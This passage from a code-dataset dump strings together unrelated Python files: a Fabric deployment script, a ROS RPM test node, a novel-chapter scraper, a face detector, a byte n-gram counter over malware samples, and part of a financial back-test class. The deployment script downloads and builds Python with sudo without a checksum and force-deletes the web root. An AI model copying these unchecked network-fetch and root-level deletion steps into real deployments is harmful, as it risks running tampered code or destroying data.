*\n\nLOCAL_ROOT = os.path.dirname(__file__)\nLOCAL_TEMP_DIR = os.path.join(os.getenv('TMPDIR', LOCAL_ROOT), 'tmp')\n\nif not os.path.exists(LOCAL_TEMP_DIR):\n os.makedirs(LOCAL_TEMP_DIR)\n\nenv.roledefs['production-servers'] = [\n 'root@socgeos.com',\n]\n\nenv.roledefs['develop-servers'] = [\n 'user@api.server1.sg',\n]\n\n### Глобальные параметры\nOS_WWW_ROOT = '/var/www'\nOS_LOG_ROOT = '/var/log/socgeos'\nOS_UID = 'www-data'\nOS_GID = 'www-data'\nOS_GID_UID = '{}:{}'.format(OS_GID, OS_UID)\n\nSERVICE_PYENV_ROOT = '/opt/pyenv3'\nSERVICE_LOG_PATH = '/'.join([OS_LOG_ROOT, '%(service_name)s'])\n\nPYTHON_ROOT = '/opt/python-3.4.1'\nPYTHON_APP = '/'.join([PYTHON_ROOT, 'bin/python3.4'])\nPYTHON_PIP = '/'.join([PYTHON_ROOT, 'bin/pip3.4'])\n\n### Глобальные параметры uwsgi\n# путь до сокета\nUWSGI_SOCKET = '/tmp/%(service_name)s.sock'\n# главный скрипт для запуска\nUWSGI_FILE = '%(uwsgi_wsgi_file)s'\n# корневой каталог сервера\nUWSGI_CHDIR = '%(www_root)s'\n# корневой каталог python-окружения\nUWSGI_HOME_ENV = '%(pyenv_root_path)s'\nUWSGI_CALLABLE = 'app'\nUWSGI_MASTER = 'true'\nUWSGI_UID = OS_UID\nUWSGI_GID = OS_GID\nUWSGI_DIEONTERM = 'true'\nUWSGI_PROCESSES = '%(uwsgi_processes)s'\nUWSGI_THREADS = '%(uwsgi_threads)s'\nUWSGI_LOGGER = '%(uwsgi_logger)s'\n\n### Настройки сервера\nSERVICE_API_FLASK_NAME = 'socgeos_api'\nSERVICE_API_FLASK_LOG_ROOT = '/'.join([OS_LOG_ROOT, SERVICE_API_FLASK_NAME])\nenv.api_flask_server = dict(\n service_name=SERVICE_API_FLASK_NAME,\n # корневой каталог нашего сервера\n www_root='/'.join([OS_WWW_ROOT, SERVICE_API_FLASK_NAME]),\n www_root_chown=OS_GID_UID,\n # сервисы, которые будут перезапускатьс�� по требованию\n system_services=[SERVICE_API_FLASK_NAME, 'nginx'],\n #\n server_git_source='http://vnlannor@192.168.1.33/socgeos/socgeos_server.git',\n # файлы/папки нашего сервера, которые нужно скопировать в %(www_root)s\n server_source_files=['server', 'run_server.py', 'requirements.txt'],\n # python-окружение нашего сервера\n pyenv_root_path='/'.join([SERVICE_PYENV_ROOT, SERVICE_API_FLASK_NAME]),\n # глобальные зависимости python-окружения\n # (устанавливаются после создания окружения)\n pyenv_depends=' '.join(['uwsgi']),\n #\n uwsgi_out_ini_filename='/'.join(['/etc/socgeos', SERVICE_API_FLASK_NAME, 'uwsgi.ini']),\n uwsgi_socket=(UWSGI_SOCKET % {'service_name': SERVICE_API_FLASK_NAME}),\n uwsgi_wsgi_file='run_server.py',\n uwsgi_processes=4,\n uwsgi_threads=2,\n uwsgi_logger='/'.join(['file:'+SERVICE_API_FLASK_LOG_ROOT, 'uwsgi.log']),\n #\n nginx_site_available='/etc/nginx/sites-available/'+SERVICE_API_FLASK_NAME,\n nginx_site_enabled='/etc/nginx/sites-enabled/default',\n)\n\n\ndef server_services(env_name, status='restart'):\n \"\"\" Запускает/Перезапускает/Останов сервисы \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n if status not in ('start', 'stop', 'restart'):\n status = 'restart'\n\n for srv in my_env['system_services']:\n sudo('service {0} {1} ; true'.format(srv, status))\n\ndef install_python():\n \"\"\" Установка Python из исходного кода \"\"\"\n PYTHON_URL = 'https://www.python.org/ftp/python/3.4.1/Python-3.4.1.tgz'\n DEPENDS = ' '.join([\n 'build-essential', 'git-core',\n 'libbz2-dev', 'libreadline-dev', 'zlib1g-dev', 'libssl-dev',\n 'libsqlite3-dev', 'libncurses5-dev', 'liblzma-dev',\n ])\n\n # if run('[ -x %s ] && true' % PYTHON_APP).return_code == 0:\n # run('echo \"%s is exists\"' % PYTHON_APP)\n # return\n\n sudo(\"mkdir -p {0}; apt-get update -q && apt-get install -q -y {1}\".format(PYTHON_ROOT, DEPENDS))\n\n with cd('/tmp'):\n # TODO: Checksum MD5\n run('wget -c -T 30 %s -O - | tar -xz' % PYTHON_URL)\n\n with cd(os.path.basename(PYTHON_URL)[:-4]):\n run('./configure --prefix=%s && make' % PYTHON_ROOT)\n sudo('make install')\n\n\ndef install_pyenv(env_name):\n \"\"\" Устанавливает Python-virtualenv \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n sudo('[ -d %(pyenv_root_path)s ] && rm -rf %(pyenv_root_path)s ; true' % my_env)\n sudo(PYTHON_APP+' -m venv %(pyenv_root_path)s' % my_env)\n sudo('%(pyenv_root_path)s/bin/pip3 install --upgrade %(pyenv_depends)s' % my_env)\n\n\ndef generate_uwsgi_config(env_name):\n \"\"\" Генерирует UWSGI конфигрурация\n @env_name: название окружения с настройками настройками сервера\n \"\"\"\n\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n values = [\n ('socket', UWSGI_SOCKET),\n ('chdir', UWSGI_CHDIR),\n ('home', UWSGI_HOME_ENV),\n ('wsgi-file', UWSGI_FILE),\n ('callable', UWSGI_CALLABLE),\n ('master', UWSGI_MASTER),\n ('uid', UWSGI_UID),\n ('gid', UWSGI_GID),\n ('die-on-term', UWSGI_DIEONTERM),\n ('processes', UWSGI_PROCESSES),\n ('threads', UWSGI_THREADS),\n ('logger', UWSGI_LOGGER),\n ]\n\n import ConfigParser\n uwsgi_ini = ConfigParser.RawConfigParser()\n uwsgi_ini.add_section('uwsgi')\n\n for (key, value) in values:\n uwsgi_ini.set('uwsgi', key, value % my_env)\n\n outfile = os.path.join(LOCAL_TEMP_DIR, 'uwsgi.ini')\n with open(outfile, 'wb') as fout:\n uwsgi_ini.write(fout)\n return outfile\n\n\ndef install_uwsgi_config(env_name, outfile):\n \"\"\" Устанавливает конфигурацию uwsgi \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n outdir = os.path.dirname(my_env['uwsgi_out_ini_filename'])\n sudo('mkdir -pv {}'.format(outdir))\n\n put(outfile, '/tmp/uwsgi.ini')\n sudo('cp -fv /tmp/uwsgi.ini %(uwsgi_out_ini_filename)s' % my_env)\n\n\ndef generate_uwsgi_service_ubuntu(env_name):\n \"\"\" Генерирует файл для запуска и останова службы \"\"\"\n TEMPLATE = \"\"\"\\\nstart on [2345]\nstop on [06]\n\nscript\n cd %(www_root)s\n exec %(pyenv_root_path)s/bin/uwsgi --ini %(uwsgi_out_ini_filename)s\nend script\n\"\"\"\n\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n outfile = os.path.join(LOCAL_TEMP_DIR, '%(service_name)s.conf' % my_env)\n with open(outfile, 'wb') as fout:\n fout.write(TEMPLATE % my_env)\n return outfile\n\n\ndef install_uwsgi_service_ubuntu(env_name, outfile):\n \"\"\" Устанавливает сервис uwsgi \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n put(outfile, '/tmp/uwsgi.conf')\n sudo('cp -fv /tmp/uwsgi.conf /etc/init/%(service_name)s.conf' % my_env)\n\n\ndef generate_nginx_config(env_name, hostname):\n \"\"\" Генерирует файл конфигурации nginx \"\"\"\n\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n TEMPLATE = \"\"\"\\\nserver {\n server_name $hostname$;\n\n location / {\n include uwsgi_params;\n uwsgi_pass unix:%(uwsgi_socket)s;\n }\n}\"\"\".replace('$hostname$', hostname)\n\n outfile = os.path.join(LOCAL_TEMP_DIR, 'nginx.conf')\n with open(outfile, 'wb') as fout:\n fout.write(TEMPLATE % my_env)\n return outfile\n\n\ndef install_nginx():\n sudo('apt-get install -y nginx-full')\n\n\ndef install_nginx_config(env_name, outfile):\n \"\"\" Установка конфигурации nginx \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n put(outfile, '/tmp/nginx.conf')\n sudo('cp -fv /tmp/nginx.conf %(nginx_site_available)s' % my_env)\n if my_env['nginx_site_available'] == my_env['nginx_site_enabled']:\n sudo(('ln -sfv %(nginx_site_enabled)s %(nginx_site_enabled)s' % my_env)+\"-$(date +%d%m%y_%H%M%S)\")\n sudo('ln -sfv %(nginx_site_available)s %(nginx_site_enabled)s' % my_env)\n\n\ndef copy_server(env_name):\n \"\"\" Копирует файлы сервера на удаленный хост \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n sudo('mkdir -p %(www_root)s ; true' % my_env)\n run('[ -d /tmp/src ] && rm -rf /tmp/src ; true')\n run('git clone %(server_git_source)s /tmp/src' % my_env)\n sudo('rm -rf %(www_root)s' % my_env)\n\n with cd('/tmp/src'):\n for f in my_env['server_source_files']:\n out = os.path.join(my_env['www_root'], f)\n outdir = os.path.dirname(out)\n sudo('mkdir -p {}; true'.format(outdir))\n sudo('cp -rf {} {}'.format(f, out))\n\n sudo('chown -R %(www_root_chown)s %(www_root)s' % my_env)\n sudo('%(pyenv_root_path)s/bin/pip3 install --upgrade -r /tmp/src/requirements.txt' % my_env)\n\nupdate_server = copy_server\n\ndef archive_server():\n \"\"\" Архивирует сервер для последующей передачи \"\"\"\n files = ['logs', 'server', 'requirements.txt', 'run_server.py', 'test_server.py']\n outfile = os.path.join(LOCAL_TEMP_DIR, 'server.tgz')\n\n local('tar cfz {0} {1}'.format(outfile, ' '.join(files)))\n local('md5 {0} > {0}.md5'.format(outfile))\n\n return outfile\n\n\ndef extract_archive_to_server(env_name):\n \"\"\" Устанавливает архив сервера на указанные хосты \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n archive = archive_server()\n put(archive, '/tmp/archive.tgz')\n\n cmd = '[ -d %(www_root)s ] && mv %(www_root)s %(www_root)s' % my_env\n sudo(cmd + '_$(date +%d%m%y_%H%M%S) ; true')\n sudo('mkdir -p %(www_root)s ; true; tar xfz /tmp/archive.tgz -C %(www_root)s' % my_env)\n sudo('chown -R %(www_root_chown)s %(www_root)s' % my_env)\n server_services(env_name, 'restart')\n\n\ndef install_server(env_name='api_flask_server', hostname='localhost'):\n \"\"\" Производит полную установку сервера \"\"\"\n server_services(env_name, 'stop')\n install_python()\n install_pyenv(env_name)\n install_uwsgi_config(env_name, generate_uwsgi_config(env_name))\n install_uwsgi_service_ubuntu(env_name, generate_uwsgi_service_ubuntu(env_name))\n install_nginx()\n install_nginx_config(env_name, generate_nginx_config(env_name, hostname))\n copy_server(env_name)\n server_services(env_name, 'restart')\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":11130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"76623699","text":"from __future__ import absolute_import\nimport numpy as np\nfrom numpy import *\nimport astropy.units as u\nimport logging #for...you guessed it...logging\nimport os,sys,inspect\n\n\n#from __init__ import phigeo, thetageo\n#from .__init__ import phigeo, thetageo\n\nthetageo=147.43 *u.deg # deg, GRAND ->astropy.units\nphigeo=0.72*u.deg # deg, GRAND ->astropy.units\n\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import cm \n\n\n\ndef trig(path, pos, new_pos, new_p2pE, Zenith, Azimuth, EThres, DISPLAY):\n '''\n Interpolates the signal peak-to-peak electric field \n at new antenna positions read at directory/new_antpos.dat\n \n Parameters:\n path: str\n path of shower event\n pos: numpy array\n x, y, z coordinates of the antennas in the simulation\n new_pos: numpy array\n x, y, z coordinates of the antennas in new layout (at 6 check points)\n new_p2pE: numpy array\n [p2p_Ex, p2p_Ey, p2p_Ez, p2p_total]: peak-to-peak electric fields along x, y, z, and norm at new antenna positions\n Zenith: float\n shower axis zenith\n Azimuth: float\n shower axis azimuth\n Ethres: float\n threshold energy for interpolation\n\n DISPLAY: boolean\n if TRUE: 2D map of peak-to-peak electric field \n at positions of triggered antennas are displayed\n \n Output:\n NT0: int\n number of triggered antennas\n indT0: 2-tuple\n indT0[0]: array of indices of triggered antennas\n\n '''\n\n \n indT0 = np.where(new_p2pE >= EThres) # get triggered antennas\n NT0 = np.size(indT0) # number of triggered antennas\n\n if DISPLAY:\n logging.debug('trig:Plotting...')\n\n ##### Plot 2d figures of total peak amplitude in positions along North-South and East-West \n fig1 = plt.figure(figsize=(10,2), dpi=100, facecolor='w', edgecolor='k')\n ax2=fig1.add_subplot(111)\n name = 'total interpolated'\n plt.title(name)\n ax2.set_xlabel('x (m)')\n ax2.set_ylabel('y (m)')\n col2=ax2.scatter(new_pos[0,:],new_pos[1,:], c=new_p2pE, vmin=np.min(new_p2pE), vmax=np.max(new_p2pE), marker='o', cmap=cm.gnuplot2_r)\n ax2.scatter(new_pos[0,indT0],new_pos[1,indT0], facecolors='none', edgecolors='k')\n plt.xlim((min(pos[0,:]),max(pos[0,:])))\n plt.ylim((min(pos[1,:]),max(pos[1,:])))\n plt.colorbar(col2)\n plt.tight_layout()\n\n\n plt.show(block=False)\n\n\n return NT0, indT0\n","sub_path":"grid_shape/trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"491003782","text":"#!/usr/bin/env python3 \nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport rospy\nfrom master_msgs.msg import traction_Orders,rpm\nimport time\n\n#counter = 0\nrpm_present = rpm()\ntraction_present = traction_Orders()\n\ntime_rpm = []\nrpm_plot = []\n\ntime_order = []\norder_plot = []\nstart = 0.0\n#state = 0\n\ndef callback_rpm(param):\n\tglobal time_rpm,rpm_plot,start\n\ttime_rpm.append(round(time.time()-start,4))\n\trpm_plot.append(param.R0_V)\n\t#print(param)\n\t\ndef callback_traction(param):\n global time_order,order_plot\n time_order.append(round(time.time()-start,4))\n order_plot.append(param.rpm_l) \n\ndef guardar():\n global time_rpm,rpm_plot\n global time_order,order_plot\n #array = np.array([time,rpm_plot])\n print(time_rpm)\n print(rpm_plot)\n print(' ')\n print(time_order)\n print(order_plot)\n\ndef node_rpm_plot():\n global rpm_present,traction_present\n global time_rpm,rpm_plot\n global start\n rospy.init_node(\"plotter_rpm\")\n rospy.Subscriber('topic_traction_orders',traction_Orders,callback_traction)\n rospy.Subscriber('topic_rpm',rpm,callback_rpm)\n pub_traction = rospy.Publisher('topic_traction_orders',traction_Orders,queue_size=10)\n rate = rospy.Rate (10)\n start = time.time()\n a = 1\n state = 0\n rpm_act = 0\n traction_present.rpm_r = rpm_act\n traction_present.rpm_l = rpm_act\n pub_traction.publish(traction_present)\n while not rospy.is_shutdown():\n te = round(time.time()-start,4)\n if a==1:\n if state==0:\n rpm_act = 0\n if te > 5:\n print(te)\n state = 1\n if state==1:\n rpm_act = 50\n if te > 10:\n print(te)\n state = 2\n elif state==2:\n rpm_act = 100\n if te > 15:\n print(te)\n state = 3\n elif state==3:\n rpm_act = 150\n if te > 20:\n print(te)\n state = 4\n elif state==4:\n rpm_act = 200\n if te > 25:\n print(te)\n state = 5\n elif state==5:\n rpm_act = 255\n if te > 30:\n print(te)\n state = 6\n elif state==6:\n rpm_act = 200\n if te > 35:\n print(te)\n state = 7\n elif state==7:\n rpm_act = 150\n if te > 40:\n print(te)\n state = 8\n elif state==8:\n rpm_act = 100\n if te > 45:\n print(te)\n state = 9\n elif state==9:\n rpm_act = 50\n if te > 50:\n print(te)\n state = 10\n elif state==10:\n rpm_act = 0\n if te > 55:\n print(te)\n state = 11\n elif state==11:\n if te>60:\n a = 0\n elif a==0:\n guardar()\n break\n traction_present.rpm_r = rpm_act\n traction_present.rpm_l = rpm_act\n pub_traction.publish(traction_present)\n rate.sleep ()\n # a = input('stop = ')\n # if int(a)==1:\n # traction_present.rpm_l = 0\n # traction_present.rpm_r = 0\n # pub_traction.publish(traction_present)\n # guardar()\n # else:\n # traction_present.rpm_l = 0\n # traction_present.rpm_r = 0\n # pub_traction.publish(traction_present)\n\nif __name__ == '__main__':\n try:\n node_rpm_plot()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"scripts/node_pid_plot_rpm.py","file_name":"node_pid_plot_rpm.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"535218503","text":"# -*- coding: utf-8 -*-\n\nimport requests\nfrom urllib.parse import urljoin\n\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\n\n\nclient = MongoClient()\ncollection = client.spider.novel\n\nstart_url = 'http://www.shuquge.com/txt/848/545887.html'\n\nname = '我要做皇帝'\nauthor = '要离刺荆轲'\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n}\n\n\ndef crawl(start_url):\n page_url = start_url\n count = 0\n\n while count < 5000:\n count += 1\n resp = requests.get(page_url)\n soup = BeautifulSoup(resp.content, 'lxml')\n\n try:\n chapter = soup.find('div', class_='content')\n title = chapter.find('h1').get_text()\n content = chapter.find(id='content').get_text()\n\n # 从全局找一下,比从局部找容错率高\n next_page = soup.find('a', text='下一章').get('href')\n next_page_url = urljoin(start_url, next_page)\n\n data = {\n 'name': name,\n 'author': author,\n 'count': count,\n 'title': title,\n 'content': '\\n'.join(content.split()),\n 'url': page_url,\n 'next_page_url': next_page_url,\n }\n collection.insert(data)\n page_url = next_page_url\n\n except AttributeError as e:\n print(count, page_url)\n break\n\n\ndef fix():\n for doc in collection.find({'content': ''}):\n print(doc['url'])\n resp = requests.get(doc['url'])\n soup = BeautifulSoup(resp.content, 'lxml')\n content = soup.find(id='content').get_text()\n doc.update(content=content)\n collection.replace_one({'_id': doc['_id']}, doc)\n\n # 第一次缺少书名和作者名作为index,添加上\n # collection.update_many({}, {'$set': {'name': '我要做皇帝', 'author': '要离刺荆轲'}})\n # collection.create_index({'name': 1, 'author': 1})\n\n\ndef make_txt(name):\n file_name = name + '.txt'\n with open(file_name, 'w') as f:\n f.write(file_name + '\\n')\n # 找出全部,按count排序\n for doc in collection.find({'name': name}).sort('count'):\n f.write('\\n\\n' + doc['title'] + '\\n\\n')\n f.write(doc['content'])\n\n\nif __name__ == '__main__':\n make_txt('我要做皇帝')","sub_path":"spider/novel.py","file_name":"novel.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"116990748","text":"input = 34000000\n\nimport primes\nimport itertools\nimport math\n\ndef all_combinations(any_list):\n return itertools.chain.from_iterable(itertools.combinations(any_list, i + 1) for i in range(len(any_list)))\n\ndef even_divisors(n):\n pf = primes.factors(n)\n p = all_combinations(pf)\n f = list(set([math.prod(x) for x in p]))\n\n return f\n\ndef num_presents(house):\n divisors = [1] + even_divisors(house)\n\n elf_numbers = list(filter(lambda x: x * 50 >= house, divisors))\n\n return sum(elf_numbers) * 11\n\nfor i in itertools.count():\n if num_presents(i) > input: break\n\nprint(i)\n","sub_path":"AdventOfCode/2015/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"190409257","text":"import cv2\n\nface_cascade = cv2.CascadeClassifier('venv/lib/python3.8/site-packages/cv2/data/haarcascade_frontalface_default.xml')\nimg = cv2.imread('resources/lena.png')\nimg_gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\nfaces = face_cascade.detectMultiScale(img_gray,1.3,3)\n\nfor (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0), 3)\n\ncv2.imshow(\"out\", img)\ncv2.waitKey(0)\n","sub_path":"openCV/face-detect.py","file_name":"face-detect.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"304154488","text":"import os\r\nN = 4\r\nHEX = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\r\nLABEL = {\"PUA\":0, \"SoftwareBundler\":1, \"Torjan\":2, \"PWS\":3, \"TrojanDownloader\":4, \"VirTool\":5, \"BackDoor\":6, \"Misleading\":7, \"BrowserModifier\":8, \"TorjanSpy\":9, \"Ransom\":10, \"Program\":11, \"Hacktool\":12, \"DDoS\":13, \"Virus\":14}\r\ncount_statistics = {}\r\n#paths = {\"./VirusShare_00dee9ce6cbd5e0997cf703825a32d76\", \"./VirusShare_0a0a82c14074b691069a603c066c22f6\", \"./VirusShare_0b4dff474876dc48f6e23841709ce3cb\"}\r\npaths = os.listdir(\"./\")\r\ncount = 0;\r\nfor path in paths:\r\n count = count + 1\r\n path = path.rstrip()\r\n file = open(path, \"rb\")\r\n for line in file:\r\n tl = str(line).rstrip().split(\"\\\\x\")[1:]\r\n tl = [element for element in tl if (len(element) == 2) and (element[0] in HEX) and (element[1] in HEX)]\r\n for i in range(len(tl) - (N - 1)):\r\n txt = \"\".join(tl[i:i + N])\r\n if (not (txt[0:2] == txt[2:4] and txt[2:4] == txt[4:6] and txt[4:6] == txt[6:8])):\r\n if (count_statistics.get(txt) == None):\r\n count_statistics[txt] = 1\r\n else:\r\n count_statistics[txt] = count_statistics[txt] + 1\r\n count_statistics = dict((key, value) for key, value in count_statistics.items() if value > 2)\r\n file.close()\r\n print(\"%i, %i\" % (count, len(count_statistics)))\r\n\r\nop = open(\"grams.txt\", \"w\")\r\nprint(len(count_statistics)) \r\nsorted_grams = sorted(count_statistics.items(), key=lambda x: x[1], reverse = True) \r\nfor i in range(100000):\r\n op.write(sorted_grams[5000 + i])\r\n op.write(\"\\n\")\r\nop.close()\r\n","sub_path":"N-gram-statistics.py","file_name":"N-gram-statistics.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"115741002","text":"from math import floor\nfrom datetime import date, datetime\nfrom lxml import etree\n\ntry:\n from django.utils import timezone\nexcept ImportError:\n timezone = None\n\nfrom ..settings import FREQS, CONFIG\nfrom ..utils import assert_, force_text, get_current_domain, INT_TYPES\n\n\nclass Formatter(object):\n def __init__(self, builder):\n self.builder = builder\n\n @classmethod\n def format_bool(cls, value):\n return 'yes' if value else 'no'\n\n @staticmethod\n def format_comma_sep(value):\n if isinstance(value, (list, tuple)):\n return ', '.join([force_text(val) for val in value])\n return value\n\n @staticmethod\n def format_date(value):\n if isinstance(value, datetime):\n value = value.date()\n if isinstance(value, date):\n return value.strftime('%Y-%m-%d')\n return value\n\n @classmethod\n def format_datetime(cls, value):\n if isinstance(value, datetime):\n if timezone:\n value = value.replace(tzinfo=timezone.get_current_timezone())\n return value.isoformat()\n return cls.format_date(value)\n\n @staticmethod\n def priority(value):\n if isinstance(value, INT_TYPES):\n value = floor(value * 10) / 10\n assert_(1. >= value >= 0., 'Priority %r invalid, must be between 0 and 1', value)\n return str(value)\n\n @classmethod\n def lastmod(cls, value):\n if isinstance(value, datetime):\n return cls.format_datetime(value)\n if isinstance(value, date):\n return cls.format_date(value)\n\n @staticmethod\n def changefreq(value):\n assert_(value in FREQS, 'Change frequency \"%s\" invalid, must be one of %s', value, ','.join(FREQS))\n return value\n\n\nclass Abstract(object):\n root_element = 'urlset'\n formatter_class = Formatter\n nsmap = {\n None: 'http://www.sitemaps.org/schemas/sitemap/0.9'\n }\n\n def __init__(self, view, object_list):\n self.view = view\n self.object_list = object_list\n self.domain = get_current_domain(view.request)\n self.protocol = 'https' if view.request.is_secure() else 'http'\n self.formatter = self.formatter_class(self)\n\n def full_url(self, absolute_url):\n return '%s://%s%s' % (self.protocol, self.domain, absolute_url)\n\n def _get(self, name, obj, default=None):\n try:\n attr = getattr(self.view, name)\n except AttributeError:\n return default\n if callable(attr):\n return attr(obj)\n return attr\n\n def ns_format(self, tag, ns=None):\n return '{%s}%s' % (self.nsmap[ns], tag)\n\n def render(self):\n conf = CONFIG()\n self.root = etree.Element(self.ns_format(self.root_element), nsmap=self.nsmap)\n count = 0\n for obj in self.object_list:\n count += len(etree.tostring(self.render_obj(obj), encoding='UTF-8'))\n if count > conf['MAX_SIZE']:\n assert_(False, 'Maximum size of %s exceeded', conf['MAX_SIZE'])\n break\n return etree.tostring(self.root, pretty_print=conf['PRETTY'],\n xml_declaration=True, encoding='UTF-8')\n","sub_path":"sitemapext/builder/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"221277622","text":"#!/usr/bin/env python3\n\nfrom fastapi import Path, Body\nfrom pydantic import BaseModel, Field\nfrom typing import List\n\nclass Dname:\n STR = \"The display name of the photographer\"\n MAX_LENGTH = 16\n PATH_PARAM = Path(..., title = STR, max_length = MAX_LENGTH)\n\nclass Fname:\n STR = \"The first name of the photographer\"\n MAX_LENGTH = 32\n\nclass Lname:\n STR = \"The last name of the photographer\"\n MAX_LENGTH = 32\n\nclass Interests:\n STR = \"The interests of the photographer\"\n\nclass Photographer(BaseModel):\n display_name: str = Field (None, title = Dname.STR, max_length = Dname.MAX_LENGTH)\n first_name: str = Field (None, title = Fname.STR, max_length = Dname.MAX_LENGTH)\n last_name: str = Field (None, title = Lname.STR, max_length = Lname.MAX_LENGTH)\n interests: List[str] = Field (None, title = Interests.STR)\n\nPHOTOGRAPHER_EXAMPLE = {\n \"display_name\": \"rdoisneau\",\n \"first_name\": \"robert\",\n \"last_name\": \"doisneau\",\n \"interests\": [\"street\", \"portrait\"],\n }\n\nPHOTOGRAPHER_BODY = Body(..., example = PHOTOGRAPHER_EXAMPLE)\n\nclass PhotographerDigest(BaseModel):\n display_name: str\n link: str\n\nclass Photographers(BaseModel):\n items: List[PhotographerDigest]\n has_more: bool\n","sub_path":"app/photographer-service/photographer_const.py","file_name":"photographer_const.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"557427578","text":"import pandas as pd\nfrom pandas.tseries.offsets import BDay\nimport numpy as np\nfrom datetime import date, datetime\nimport logging\n\n# my own modules\nfrom financial_database import FinancialDatabase\nfrom config_database import my_database_name\nfrom index_signal import Signal\nfrom index_weight import _Weight\nfrom finance_tools import index_calculation\nfrom dataframe_tools import select_rows_from_dataframe_based_on_sub_calendar\n\n# Logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s : %(module)s : %(funcName)s : %(message)s')\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\n\n\nclass Basket:\n \"\"\"Class definition of Basket\"\"\"\n\n def __init__(self, tickers: {str, list}, currency: str = None, total_return: bool = False, dividend_tax: float = 0.0):\n self.tickers = tickers\n self.currency = currency\n self.total_return = total_return\n self.dividend_tax = dividend_tax\n\n def basket_prices(self, start_date: {date, datetime}=None, end_date: {date, datetime}=None):\n financial_database_handler = FinancialDatabase(my_database_name, False)\n if self.total_return:\n return financial_database_handler.get_total_return_df(self.tickers, start_date, end_date, self.dividend_tax,\n self.currency)\n else:\n return financial_database_handler.get_close_price_df(self.tickers, start_date, end_date, self.currency)\n\n # ------------------------------------------------------------------------------------------------------------------\n # getter and setter methods\n\n @property\n def dividend_tax(self):\n return self._dividend_tax\n\n @dividend_tax.setter\n def dividend_tax(self, dividend_tax: float):\n if dividend_tax >= 0:\n self._dividend_tax = dividend_tax\n else:\n raise ValueError('dividend_tax needs to be greater or equal to zero.')\n\n def __repr__(self):\n return \"\"\\\n .format(len(self.tickers), currency=self.currency if self.currency else 'local',\n total_return='total return' if self.total_return else 'price return',\n dividend_tax=' with ' + str(round(self.dividend_tax*100, 2)) + '% dividend tax' if self.dividend_tax and self.total_return else '')\n\n\nclass Index(Basket):\n \"\"\"Class definition of Index. Subclass of Basket class.\"\"\"\n\n def __init__(self, tickers: {str, list}, rebalancing_calendar: pd.DatetimeIndex, index_fee: float = 0.0,\n transaction_cost: float = 0.0, currency: str = None, total_return: bool = False,\n dividend_tax: float = 0.0, initial_amount: float = 100.0):\n super().__init__(tickers, currency, total_return, dividend_tax)\n self.rebalancing_calendar = rebalancing_calendar\n self.index_fee = index_fee\n self.transaction_cost = transaction_cost\n self.initial_amount = initial_amount\n self._signal = None\n self._weight = None\n\n def _check_before_back_test(self):\n if self.signal is None:\n self.signal = Signal(ticker_list=self.tickers) # default signal\n if self.weight is None:\n raise ValueError('No weight assigned.')\n\n def get_back_test(self, end_date: {date, datetime}=None, return_index_only: bool = True):\n back_test = self._get_back_test_or_weight_df(True, end_date)\n if return_index_only:\n return back_test[['index']]\n return back_test\n\n def get_weight_df(self, end_date: {date, datetime}=None):\n return self._get_back_test_or_weight_df(True, end_date)\n\n def _get_back_test_or_weight_df(self, get_back_test: bool, end_date: {date, datetime}=None):\n # handle the start and end date\n start_date = self.rebalancing_calendar[0] - BDay(5)\n if end_date is not None and np.datetime64(end_date) <= 